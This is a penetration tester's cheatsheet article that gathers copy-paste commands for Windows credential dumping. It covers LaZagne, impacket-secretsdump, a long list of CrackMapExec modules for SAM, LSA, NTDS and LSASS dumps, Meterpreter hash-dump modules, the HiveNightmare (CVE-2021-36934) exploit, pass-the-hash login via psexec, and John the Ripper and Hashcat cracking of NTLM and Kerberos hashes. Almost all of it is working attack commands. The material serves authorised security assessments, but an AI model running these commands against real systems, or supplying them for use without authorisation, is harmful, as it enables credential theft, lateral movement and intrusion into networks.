Cheatsheet with current tools & techniques for Windows credentials dumping.

INTRODUCTION

The article presents the current tools & techniques for Windows credential dumping. It will be very short and written in cheatsheet style. The main goal was to aggregate commands in one place, so you can just copy&paste them during the assessment. As a bonus to this short article, in the end, you will find the commands for cracking Windows hashes using John The Ripper and Hashcat.

TOOLS

1. LaZagne
2. Impacket
3. CrackMapExec
4. HiveNightmare (CVE-2021–36934)
5. Meterpreter — credential_collector
6. Meterpreter — smart_hashdump

COMMANDS

• Finding passwords for the most commonly-used software:

laZagne.exe all

• Manual search for the text ‘password’ in certain file types:

findstr /si 'password' *.txt *.xml *.docx

• Remote hash dumping without executing any agent on the target:

impacket-secretsdump $domain/$user:[email protected]$ip

• Various hash dumping techniques using CME:
  (use option --local-auth if your user is a local account)

crackmapexec smb $ip -u $user -p $pass --sam
crackmapexec smb $ip -u $user -p $pass --lsa
crackmapexec smb $ip -u $user -p $pass --ntds
crackmapexec smb $ip -u $user -p $pass --ntds vss
crackmapexec smb $ip -u $user -p $pass -M lsassy
crackmapexec smb $ip -u $user -p $pass -M wireless
crackmapexec smb $ip -u $user -p $pass -M handlekatz
crackmapexec smb $ip -u $user -p $pass -M nanodump
crackmapexec smb $ip -u $user -p $pass -M procdump
crackmapexec smb $ip -u $user -p $pass --laps
crackmapexec smb $ip -u $user -p $pass -M gpp_password

If the default administrator name is not administrator add the user name after the option: --laps <name>

• Decrypting GPP:

gpp-decrypt $encrypted_password

• Meterpreter modules:
  (A good idea is to first migrate to the lsass.exe process)

migrate <id of lsass.exe>
run post/windows/gather/credentials/credential_collector
run post/windows/gather/smart_hashdump

CVE-2021–36934 aka SeriousSam

Exploit allowing you to read any registry hives as non-admin.

• Get SAM, SECURITY and SYSTEM hive dumps:

.\HiveNightmare.exe

• Download those 3 files to your machine and dump the hashes:

impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY local

• Log in to the remote system using the PSHtechnique:

impacket-psexec -hashes $hash [email protected]$ip

CRACKING

• LM

john --format=lm hash.txt
hashcat -m 3000 -a 3 hash.txt

• NTML

john --format=nt hash.txt
hashcat -m 1000 -a 3 hash.txt

• NTLMv1

john --format=netntlm hash.txt
hashcat -m 5500 -a 3 hash.txt

• NTLMv2

john --format=netntlmv2 hash.txt
hashcat -m 5600 -a 0 hash.txt

• Kerberos 5 TGS

john --format=krb5tgs hash.txt --wordlist=rockyou.txt
hashcat -m 13100 -a 0 hash.txt rockyou.txt

• Kerberos ASREP

john --format=krb5asrep hash.txt --wordlist=rockyou.txt
hashcat -m18200 hash.txt rockyou.txt

FINAL WORDS
During the creation of the list with the above-mentioned commands, I tried not to use several tools for the same task — that is why legendary Mimikatz is not there. If you have any ideas on how to improve the above list with commands that dump passwords using techniques not mentioned above then feel free to comment. 

I hope you will find the above tools & commands useful for your assessment!

About the Author

Karol Mazurek - penetration tester.

The article was originally published at: https://karol-mazurek95.medium.com/windows-credentials-dumping-5898d896d048